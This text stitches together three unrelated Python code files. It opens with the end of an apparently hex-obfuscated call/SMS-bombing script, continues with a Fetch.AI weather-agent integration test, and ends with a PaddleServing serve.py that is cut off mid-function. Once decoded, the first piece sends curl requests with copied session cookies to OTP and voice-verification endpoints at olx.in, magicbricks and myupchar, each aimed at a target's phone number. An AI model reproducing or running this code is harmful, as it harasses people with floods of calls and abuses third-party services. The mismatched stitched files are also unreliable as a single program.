\x71\x6e\x54\x57\x4c\x61\x75\x6e\x6c\x79\x78\x6b\x74\x48\x4c\x62\x45\x38\x42\x53\x73\x74\x50\x43\x52\x59\x6e\x38\x56\x64\x50\x31\x35\x6c\x76\x55\x78\x4b\x33\x5a\x59\x39\x61\x68\x58\x4f\x53\x67\x77\x41\x69\x64\x78\x77\x58\x64\x31\x6a\x43\x65\x35\x77\x6a\x49\x7a\x59\x62\x69\x58\x70\x35\x65\x4b\x4e\x57\x66\x46\x70\x6f\x77\x68\x46\x62\x70\x78\x6c\x6f\x65\x2b\x53\x72\x62\x69\x45\x30\x59\x48\x4a\x56\x50\x63\x43\x56\x35\x62\x6d\x64\x73\x48\x67\x50\x66\x51\x63\x3d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x41\x4d\x50\x5f\x54\x4f\x4b\x45\x4e\x3d\x25\x32\x34\x4e\x4f\x54\x5f\x46\x4f\x55\x4e\x44\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x68\x69\x6e\x74\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x69\x64\x3d\x47\x41\x31\x2e\x32\x2e\x33\x36\x39\x38\x31\x39\x32\x37\x36\x2e\x31\x35\x35\x39\x35\x33\x35\x35\x31\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x3d\x47\x41\x31\x2e\x32\x2e\x36\x36\x35\x36\x38\x38\x37\x35\x33\x2e\x31\x35\x35
\x39\x35\x33\x35\x35\x31\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x64\x54\x64\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x3d\x67\x6f\x6f\x67\x6c\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x48\x49\x44\x45\x5f\x4f\x4e\x42\x4f\x41\x52\x44\x49\x4e\x47\x5f\x4c\x4f\x43\x41\x54\x49\x4f\x4e\x3d\x74\x72\x75\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x74\x65\x73\x74\x43\x6f\x6f\x6b\x69\x65\x3d\x74\x65\x73\x74\x43\x6f\x6f\x6b\x69\x65\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x61\x6b\x5f\x62\x6d\x73\x63\x3d\x33\x30\x37\x43\x35\x33\x31\x31\x46\x42\x30\x30\x41\x33\x46\x34\x45\x38\x35\x36\x41\x46\x46\x45\x31\x41\x39\x44\x30\x30\x30\x42\x30\x32\x31\x34\x42\x45\x44\x39\x45\x30\x32\x31\x30\x30\x30\x30\x39\x30\x39\x46\x46\x34\x35\x43\x31\x45\x38\x30\x32\x30\x36\x37\x7e\x70\x6c\x46\x5a\x66\x62\x4d\x51\x47\x67\x45\x44\x72\x37\x4f\x57\x56\x65\x39\x46\x76\x71\x66\x54\x32\x34\x5a\x74\x4f\x56\x4d\x61\x6d\x74\x59\x63\x61\x69\x70\x37\x31\x49\x59\x4f\x72\x76\x32\x2b\x53\x51\x36\x66\x6f\x6b\x53\x76\x4d\x6b\x32\x55\x65\x73\x7a\x35\x76\x31\x73\x46\x66\x61\x69\x63\x68\x62\x74\x44\x67\x65\x56\x53\x6a\x33\x74\x65\x33\x76\x58\x4a\x4b\x65\x7a\x53\x57\x67\x76\x6f\x56\x57\x72\x4b\x37\x67\x66\x7a\x46\x72\x4c\x7a\x31\x72\x75\x42\x6d\x30\x4d\x51\x6a\x30\x31\x56\x35\x43\x6d\x70\x61\x54\x72\x36\x74\x52\x67\x44\x52\x53\x4e\x36\x62\x6b\x73\x33\x6e\x71\x76\x4f\x48\x7a\x52\x30\x74\x41\x31\x49\x6f\x71\x66\x44\x66\x71\x32\x4d\x4b\x74\x6d\x44\x6a\x62\x6b\x6e\x43\x49\x35\x46\x6c\x4c\x59\x55\x54\x77\x71\x6c\x6e\x77\x48\x6f\x77\x59\x41\x72\x66\x79\x62\x6e\x32\x6e\x33\x79\x69\x6c\x45\x36\x56\x4b\x48\x6a\x57\x2b\x74\x48\x38\x6b\x71\x6a\x41\x66\x48\x38\x42\x47\x75\x69\x6a\x70\x6d\x4f\x39\x70\x4e\x6b\x67\x6d\x49\x79\x4f\x65\x61\x5a\x49\x56\x4d\x33\x6b\x36\x46\x47\x4f\x4c\x33\x57\x6a\x33\x6a\x4c\x49\x38\x75\x47\x61\x55\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x61\x62\x63
\x6b\x3d\x31\x35\x33\x42\x44\x33\x44\x33\x33\x33\x39\x34\x38\x41\x35\x38\x39\x33\x32\x37\x34\x38\x43\x41\x43\x33\x44\x34\x43\x33\x46\x34\x30\x32\x31\x34\x42\x45\x44\x39\x45\x30\x32\x31\x30\x30\x30\x30\x39\x30\x39\x46\x46\x34\x35\x43\x31\x38\x38\x33\x38\x45\x30\x35\x7e\x30\x7e\x38\x4f\x2b\x75\x64\x78\x64\x47\x33\x38\x73\x42\x46\x54\x50\x5a\x70\x61\x42\x4c\x34\x49\x47\x6a\x37\x65\x55\x63\x4b\x4a\x31\x56\x77\x41\x74\x4a\x35\x32\x47\x4d\x4f\x35\x45\x3d\x7e\x2d\x31\x7e\x2d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x62\x6d\x5f\x73\x7a\x3d\x42\x44\x36\x36\x35\x44\x39\x31\x39\x46\x37\x43\x36\x46\x41\x38\x33\x37\x34\x46\x31\x39\x36\x34\x34\x35\x35\x39\x36\x34\x33\x36\x7e\x59\x41\x41\x51\x32\x62\x34\x55\x41\x72\x70\x4f\x41\x77\x74\x72\x41\x51\x41\x41\x71\x30\x71\x50\x47\x77\x4e\x6b\x73\x48\x42\x67\x70\x68\x4c\x77\x44\x7a\x77\x66\x42\x6c\x77\x49\x52\x51\x4a\x41\x47\x37\x74\x78\x6d\x6a\x42\x6f\x2f\x6f\x66\x37\x4e\x69\x41\x4a\x39\x33\x67\x79\x2f\x37\x76\x42\x68\x51\x39\x6c\x35\x73\x49\x4b\x64\x77\x74\x6c\x32\x6a\x2b\x55\x34\x62\x79\x73\x32\x48\x68\x68\x35\x74\x5a\x6c\x5a\x4c\x2f\x6a\x71\x64\x6e\x57\x2f\x4a\x72\x67\x6d\x67\x61\x77\x63\x78\x69\x75\x6e\x41\x4a\x33\x32\x42\x62\x59\x39\x55\x74\x6e\x46\x49\x72\x4e\x78\x62\x62\x52\x76\x7a\x51\x43\x59\x6e\x53\x77\x66\x2f\x63\x7a\x39\x61\x37\x6a\x55\x52\x73\x75\x69\x37\x6c\x65\x75\x4c\x61\x56\x6d\x37\x6d\x51\x45\x63\x48\x50\x4f\x74\x43\x36\x67\x35\x6a\x72\x54\x6f\x41\x4d\x54\x62\x64\x41\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x39\x37\x63\x30\x39\x65\x32\x61\x61\x62\x64\x66\x65\x64\x38\x39\x62\x38\x37\x61\x33\x30\x31\x30\x64\x37\x66\x31\x33\x63\x36\x34\x3d\x33\x35\x33\x62\x34\x66\x39\x66\x64\x38\x32\x64\x32\x36\x32\x36\x38\x61\x64\x31\x31\x62\x32\x63\x31\x65\x39\x61\x65\x30\x31\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x71\x73\x74\x61\x74\x75\x73\x3d\x31\x35\x35\x39\x35\x33\x36\x37\x30\x34\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6c\x61\x71\x75\x65\x73\x69\x73\x3d\x70\x61\x6e\x2d\x32
\x36\x33\x38\x31\x40\x61\x23\x70\x61\x6e\x2d\x32\x37\x37\x35\x32\x40\x62\x23\x70\x61\x6e\x2d\x33\x30\x30\x34\x33\x40\x62\x23\x70\x61\x6e\x61\x2d\x32\x36\x33\x38\x31\x40\x62\x22\x20\x2d\x64\x20\x5c\x27\x7b\x22\x74\x79\x70\x65\x22\x3a\x22\x63\x61\x6c\x6c\x22\x2c\x22\x64\x65\x73\x63\x72\x69\x70\x74\x6f\x72\x22\x3a\x22\x2b\x39\x31\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x7d\x5c\x27\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x63\x68\x61\x6c\x6c\x65\x6e\x67\x65\x73\x22\x20\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x34\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x47\x45\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x61\x70\x69\x2e\x6d\x61\x67\x69\x63\x62\x72\x69\x63\x6b\x73\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x22\x20\x2d\x48\x20\x22\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x38\x39\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x3a\x6f\x6e\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x3a\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x69\x6d\x61\x67\x65\x2f\x61\x70\x6e\x67\x2c\x69\x6d\x61\x67\x65\x2f\x2a\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a
\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x22\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x6d\x61\x67\x69\x63\x62\x72\x69\x63\x6b\x73\x2e\x63\x6f\x6d\x2f\x62\x72\x69\x63\x6b\x73\x2f\x76\x65\x72\x69\x66\x79\x4f\x6e\x43\x61\x6c\x6c\x2e\x68\x74\x6d\x6c\x3f\x6d\x6f\x62\x69\x6c\x65\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x2e\x64\x65\x63\x6f\x64\x65\x28\x27\x75\x74\x66\x2d\x38\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x73\x74\x72\x69\x70\x28\x29\x2e\x66\x69\x6e\x64\x28\x27\x63\x61\x6c\x6c\x6d\x61\x64\x65\x27\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6d\x79\x75\x70\x63\x68\x61\x72\x2e\x63\x6f\x6d\x2f\x75\x73\x65\x72\x5f\x70\x72\x6f\x66\x69\x6c\x65\x2f\x72\x65\x73\x65\x6e\x64\x5f\x6f\x74\x70\x5f\x76\x69\x61\x5f\x76\x6f\x69\x63\x65\x3f\x69\x64\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x31\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65
'''
file2.writelines(L)
file2.close()
if __name__=='__main__':
verCheck()
p1 = Process(target = magic())
p1.start()
p2 = Process(target = loadingHack())
p2.start()
print("\n")
#
|
test_weather_ledger.py | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This test module contains the integration test for the weather skills."""
import os
import pytest
import shutil
import signal
import subprocess
import sys
import tempfile
import time
import io
import threading
from ...common.click_testing import CliRunner
from aea.cli import cli
from tests.conftest import CLI_LOG_OPTION
def _read_tty(pid: subprocess.Popen):
for line in io.TextIOWrapper(pid.stdout, encoding="utf-8"):
print("stdout: " + line.replace("\n", ""))
def _read_error(pid: subprocess.Popen):
for line in io.TextIOWrapper(pid.stderr, encoding="utf-8"):
print("stderr: " + line.replace("\n", ""))
class TestWeatherSkillsFetchaiLedger:
    """Integration test: run the ledger-backed weather station/client skills end to end."""

    @pytest.fixture(autouse=True)
    def _start_oef_node(self, network_node):
        """Start an oef node."""

    @classmethod
    def setup_class(cls):
        """Set up the test class."""
        cls.runner = CliRunner()
        cls.agent_name_one = "my_weather_station"
        cls.agent_name_two = "my_weather_client"
        # Remember the repo root (source of packages/scripts), then work
        # inside a throw-away temporary directory.
        cls.cwd = os.getcwd()
        cls.t = tempfile.mkdtemp()
        os.chdir(cls.t)

    def test_weather(self, pytestconfig):
        """Run the weather skills sequence."""
        if pytestconfig.getoption("ci"):
            pytest.skip("Skipping the test since it doesn't work in CI.")
        # add packages folder
        packages_src = os.path.join(self.cwd, 'packages')
        packages_dst = os.path.join(os.getcwd(), 'packages')
        shutil.copytree(packages_src, packages_dst)
        # Add scripts folder
        scripts_src = os.path.join(self.cwd, 'scripts')
        scripts_dst = os.path.join(os.getcwd(), 'scripts')
        shutil.copytree(scripts_src, scripts_dst)
        # create agent one and agent two
        result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "create", self.agent_name_one], standalone_mode=False)
        assert result.exit_code == 0
        result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "create", self.agent_name_two], standalone_mode=False)
        assert result.exit_code == 0
        # add packages for agent one and run it
        agent_one_dir_path = os.path.join(self.t, self.agent_name_one)
        os.chdir(agent_one_dir_path)
        result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "add", "skill", "weather_station_ledger"], standalone_mode=False)
        assert result.exit_code == 0
        # Launch agent one as a subprocess ("python -m aea.cli run").
        process_one = subprocess.Popen([
            sys.executable,
            '-m',
            'aea.cli',
            "run"
        ],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            env=os.environ.copy())
        os.chdir(self.t)
        # add packages for agent two and run it
        agent_two_dir_path = os.path.join(self.t, self.agent_name_two)
        os.chdir(agent_two_dir_path)
        result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "add", "skill", "weather_client_ledger"], standalone_mode=False)
        assert result.exit_code == 0
        # Load the agent yaml file and manually insert the things we need
        file = open("aea-config.yaml", mode='r')
        # read all lines at once
        whole_file = file.read()
        # add in the ledger address
        find_text = "ledger_apis: []"
        # NOTE(review): leading whitespace inside this YAML snippet was
        # reconstructed — confirm it matches the aea-config schema.
        replace_text = """ledger_apis:
  - ledger_api:
      addr: alpha.fetch-ai.com
      ledger: fetchai
      port: 80"""
        whole_file = whole_file.replace(find_text, replace_text)
        # close the file
        file.close()
        with open("aea-config.yaml", 'w') as f:
            f.write(whole_file)
        # Generate the private keys
        result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "generate-key", "fetchai"], standalone_mode=False)
        assert result.exit_code == 0
        # Add some funds to the weather station
        os.chdir(os.path.join(scripts_dst, "../"))
        result = subprocess.call(["python", "./scripts/fetchai_wealth_generation.py", "--private-key", os.path.join("./", self.agent_name_two, "fet_private_key.txt"), "--amount", "10000000", "--addr", "alpha.fetch-ai.com", "--port", "80"])
        assert result == 0
        os.chdir(agent_two_dir_path)
        process_two = subprocess.Popen([
            sys.executable,
            '-m',
            'aea.cli',
            "run"
        ],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            env=os.environ.copy())
        # Mirror both agents' stdout/stderr onto the test output via reader
        # threads.  NOTE(review): the threads are never joined and the first
        # pair of handles is overwritten by the second pair.
        tty_read_thread = threading.Thread(target=_read_tty, args=(process_one, ))
        tty_read_thread.start()
        error_read_thread = threading.Thread(target=_read_error, args=(process_one, ))
        error_read_thread.start()
        tty_read_thread = threading.Thread(target=_read_tty, args=(process_two, ))
        tty_read_thread.start()
        error_read_thread = threading.Thread(target=_read_error, args=(process_two, ))
        error_read_thread.start()
        # Let the two agents interact for a minute, then stop them gracefully.
        time.sleep(60)
        process_one.send_signal(signal.SIGINT)
        process_two.send_signal(signal.SIGINT)
        process_one.wait(timeout=60)
        process_two.wait(timeout=60)
        # text1, err1 = process_one.communicate()
        # text2, err2 = process_two.communicate()
        assert process_one.returncode == 0
        assert process_two.returncode == 0
        # Hard-terminate anything still alive before cleaning up.
        poll_one = process_one.poll()
        if poll_one is None:
            process_one.terminate()
            process_one.wait(2)
        poll_two = process_two.poll()
        if poll_two is None:
            process_two.terminate()
            process_two.wait(2)
        os.chdir(self.t)
        result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "delete", self.agent_name_one], standalone_mode=False)
        assert result.exit_code == 0
        result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "delete", self.agent_name_two], standalone_mode=False)
        assert result.exit_code == 0

    @classmethod
    def teardown_class(cls):
        """Teardown the test: restore the cwd and remove the temp directory."""
        os.chdir(cls.cwd)
        try:
            shutil.rmtree(cls.t)
        except (OSError, IOError):
            pass
|
serve.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage:
Host a trained paddle model with one line command
Example:
python -m paddle_serving_server.serve --model ./serving_server_model --port 9292
"""
import argparse
import os
import json
import base64
import time
from multiprocessing import Process
import sys
if sys.version_info.major == 2:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
elif sys.version_info.major == 3:
from http.server import BaseHTTPRequestHandler, HTTPServer
from contextlib import closing
import socket
from paddle_serving_server.env import CONF_HOME
import signal
from paddle_serving_server.util import *
# web_service.py is still used by Pipeline.
def port_is_available(port):
    """Return True when nothing accepts TCP connections on 127.0.0.1:`port`.

    A successful connect (``connect_ex`` returning 0) means the port is
    occupied, so the port is reported as unavailable.
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    with closing(probe):
        probe.settimeout(2)
        rc = probe.connect_ex(('127.0.0.1', port))
    return rc != 0
def format_gpu_to_strlist(unformatted_gpus):
    """Normalize a GPU specification into a list of comma-separated id strings.

    Accepted inputs: an int, a list of ids, a string ("" means CPU), or None.
    CPU-only is always represented as ["-1"].

    Raises:
        ValueError: on an unsupported input type, an id below -1, or a
            single op spec that mixes CPU (-1) with real GPU ids.
    Exits the process when an id is not listed in CUDA_VISIBLE_DEVICES.
    """
    if isinstance(unformatted_gpus, int):
        gpus_strlist = [str(unformatted_gpus)]
    elif isinstance(unformatted_gpus, list):
        if unformatted_gpus == [""] or len(unformatted_gpus) == 0:
            gpus_strlist = ["-1"]
        else:
            gpus_strlist = [str(x) for x in unformatted_gpus]
    elif isinstance(unformatted_gpus, str):
        gpus_strlist = ["-1"] if unformatted_gpus == "" else [unformatted_gpus]
    elif unformatted_gpus is None:
        gpus_strlist = ["-1"]
    else:
        raise ValueError("error input of set_gpus")

    # check cuda visible
    if "CUDA_VISIBLE_DEVICES" in os.environ:
        env_gpus = os.environ["CUDA_VISIBLE_DEVICES"].split(",")
        for op_gpus_str in gpus_strlist:
            op_gpu_list = op_gpus_str.split(",")
            # op_gpu_list == ["-1"] means this op use CPU
            # so don`t check cudavisible.
            if op_gpu_list == ["-1"]:
                continue
            for ids in op_gpu_list:
                if ids not in env_gpus:
                    print("gpu_ids is not in CUDA_VISIBLE_DEVICES.")
                    exit(-1)

    # check gpuid is valid
    for op_gpus_str in gpus_strlist:
        id_values = [int(ids) for ids in op_gpus_str.split(",")]
        if any(v < -1 for v in id_values):
            raise ValueError("The input of gpuid error.")
        # BUG FIX: the original flag-based check only rejected "-1 after a
        # GPU id" (e.g. "0,-1") and silently accepted "-1,0".  Mixing CPU
        # and GPU in one op spec is invalid regardless of the order.
        if any(v == -1 for v in id_values) and any(v >= 0 for v in id_values):
            raise ValueError("You can not use CPU and GPU in one model.")
    return gpus_strlist
def is_gpu_mode(unformatted_gpus):
    """Return True when the normalized spec contains at least one real GPU id."""
    for op_gpus_str in format_gpu_to_strlist(unformatted_gpus):
        if any(int(device_id) >= 0 for device_id in op_gpus_str.split(",")):
            return True
    return False
def serve_args():
    """Build the command-line interface for PaddleServing and parse sys.argv."""
    parser = argparse.ArgumentParser("serve")
    add = parser.add_argument
    # Positional sub-command; defaults to starting the server.
    add("server", type=str, default="start", nargs="?",
        help="stop or start PaddleServing")
    add("--thread", type=int, default=4,
        help="Concurrency of server,[4,1024]", choices=range(4, 1025))
    add("--port", type=int, default=9393, help="Port of the starting gpu")
    add("--device", type=str, default="cpu", help="Type of device")
    add("--gpu_ids", type=str, default="", nargs="+", help="gpu ids")
    add("--op_num", type=int, default=0, nargs="+", help="Number of each op")
    add("--op_max_batch", type=int, default=32, nargs="+",
        help="Max batch of each op")
    add("--model", type=str, default="", nargs="+", help="Model for serving")
    add("--workdir", type=str, default="workdir",
        help="Working dir of current service")
    add("--use_mkl", default=False, action="store_true", help="Use MKL")
    add("--precision", type=str, default="fp32",
        help="precision mode(fp32, int8, fp16, bf16)")
    add("--use_calib", default=False, action="store_true",
        help="Use TensorRT Calibration")
    add("--mem_optim_off", default=False, action="store_true",
        help="Memory optimize")
    add("--ir_optim", default=False, action="store_true", help="Graph optimize")
    add("--max_body_size", type=int, default=512 * 1024 * 1024,
        help="Limit sizes of messages")
    add("--use_encryption_model", default=False, action="store_true",
        help="Use encryption model")
    add("--use_trt", default=False, action="store_true", help="Use TensorRT")
    add("--use_lite", default=False, action="store_true", help="Use PaddleLite")
    add("--use_xpu", default=False, action="store_true", help="Use XPU")
    add("--product_name", type=str, default=None,
        help="product_name for authentication")
    add("--container_id", type=str, default=None,
        help="container_id for authentication")
    add("--gpu_multi_stream", default=False, action="store_true",
        help="Use gpu_multi_stream")
    return parser.parse_args()
def start_gpu_card_model(gpu_mode, port, args):  # pylint: disable=doc-string-missing
    """Configure and run one serving.Server on `port`.

    gpu_mode: True selects the "gpu" device, anything else "cpu".
    args: namespace produced by serve_args().
    Exits the process when no model is given; blocks in run_server().
    """
    device = "cpu"
    if gpu_mode == True:
        device = "gpu"
    thread_num = args.thread
    model = args.model
    # --mem_optim_off is a negative flag: memory optimization is on by default.
    mem_optim = args.mem_optim_off is False
    ir_optim = args.ir_optim
    use_mkl = args.use_mkl
    max_body_size = args.max_body_size
    # Each port gets its own working directory.
    workdir = "{}_{}".format(args.workdir, port)
    if model == "":
        print("You must specify your serving model")
        exit(-1)
    # Every model entry must be a directory, never a plain file.
    for single_model_config in args.model:
        if os.path.isdir(single_model_config):
            pass
        elif os.path.isfile(single_model_config):
            raise ValueError("The input of --model should be a dir not file.")
    import paddle_serving_server as serving
    op_maker = serving.OpMaker()
    op_seq_maker = serving.OpSeqMaker()
    # Pipeline: general_reader -> one infer op per model -> general_response.
    read_op = op_maker.create('general_reader')
    op_seq_maker.add_op(read_op)
    for idx, single_model in enumerate(model):
        infer_op_name = "general_infer"
        # Currently the OCR "Det" model node depends on the third-party
        # opencv library; opencv is only linked in (and GeneralDetectionOp
        # compiled) when OCR is used.  Hence the special case below — in
        # every other situation the added op defaults to GeneralInferOp.
        # Generating this configuration from a python script may be
        # reconsidered in the future.
        if len(model) == 2 and idx == 0 and single_model == "ocr_det_model":
            infer_op_name = "general_detection"
        else:
            infer_op_name = "general_infer"
        general_infer_op = op_maker.create(infer_op_name)
        op_seq_maker.add_op(general_infer_op)
    general_response_op = op_maker.create('general_response')
    op_seq_maker.add_op(general_response_op)
    server = serving.Server()
    server.set_op_sequence(op_seq_maker.get_op_sequence())
    server.set_num_threads(thread_num)
    server.use_mkl(use_mkl)
    server.set_precision(args.precision)
    server.set_use_calib(args.use_calib)
    server.set_memory_optimize(mem_optim)
    server.set_ir_optimize(ir_optim)
    server.set_max_body_size(max_body_size)
    # TensorRT and multi-stream only make sense on the GPU device.
    if args.use_trt and device == "gpu":
        server.set_trt()
        server.set_ir_optimize(True)
    if args.gpu_multi_stream and device == "gpu":
        server.set_gpu_multi_stream()
    if args.op_num:
        server.set_op_num(args.op_num)
    if args.op_max_batch:
        server.set_op_max_batch(args.op_max_batch)
    if args.use_lite:
        server.set_lite()
    server.set_device(device)
    if args.use_xpu:
        server.set_xpu()
    if args.product_name != None:
        server.set_product_name(args.product_name)
    if args.container_id != None:
        server.set_container_id(args.container_id)
    if gpu_mode == True:
        server.set_gpuid(args.gpu_ids)
    server.load_model_config(model)
    server.prepare_server(
        workdir=workdir,
        port=port,
        device=device,
        use_encryption_model=args.use_encryption_model)
    # Blocks until the server is shut down.
    server.run_server()
def start_multi_card(args, serving_port=None):  # pylint: disable=doc-string-missing
    """Launch the serving process, deciding CPU/GPU mode from the arguments."""
    port = args.port if serving_port is None else serving_port
    if args.use_lite:
        print("run using paddle-lite.")
        gpu_mode = False
    else:
        gpu_mode = is_gpu_mode(args.gpu_ids)
    start_gpu_card_model(gpu_mode, port, args)
class MainService(BaseHTTPRequestHandler):
    """HTTP front door used with --use_encryption_model.

    A client POSTs the base64 model key; on the first valid request the key
    is written next to each model and the real serving process is forked on
    a dynamically chosen port.  Relies on module-level globals: ``args``,
    ``serving_port``, ``p`` (the child process) and ``p_flag`` (started?).
    """

    def get_available_port(self):
        # Probe ports 12000..12999 and return the first free one.
        # NOTE(review): implicitly returns None when all 1000 ports are busy.
        default_port = 12000
        for i in range(1000):
            if port_is_available(default_port + i):
                return default_port + i

    def start_serving(self):
        # Child-process entry point: run the server on the chosen port.
        start_multi_card(args, serving_port)

    def get_key(self, post_data):
        # Decode the base64 "key" field and write it to <model>/key for every
        # configured model dir.  False when the request carried no key.
        if "key" not in post_data:
            return False
        else:
            key = base64.b64decode(post_data["key"].encode())
            for single_model_config in args.model:
                if os.path.isfile(single_model_config):
                    raise ValueError(
                        "The input of --model should be a dir not file.")
                with open(single_model_config + "/key", "wb") as f:
                    f.write(key)
            return True

    def check_key(self, post_data):
        # Compare the POSTed key with the stored <model>/key of every model;
        # False on a missing key or any mismatch.
        if "key" not in post_data:
            return False
        else:
            key = base64.b64decode(post_data["key"].encode())
            for single_model_config in args.model:
                if os.path.isfile(single_model_config):
                    raise ValueError(
                        "The input of --model should be a dir not file.")
                with open(single_model_config + "/key", "rb") as f:
                    cur_key = f.read()
                if key != cur_key:
                    return False
            return True

    def start(self, post_data):
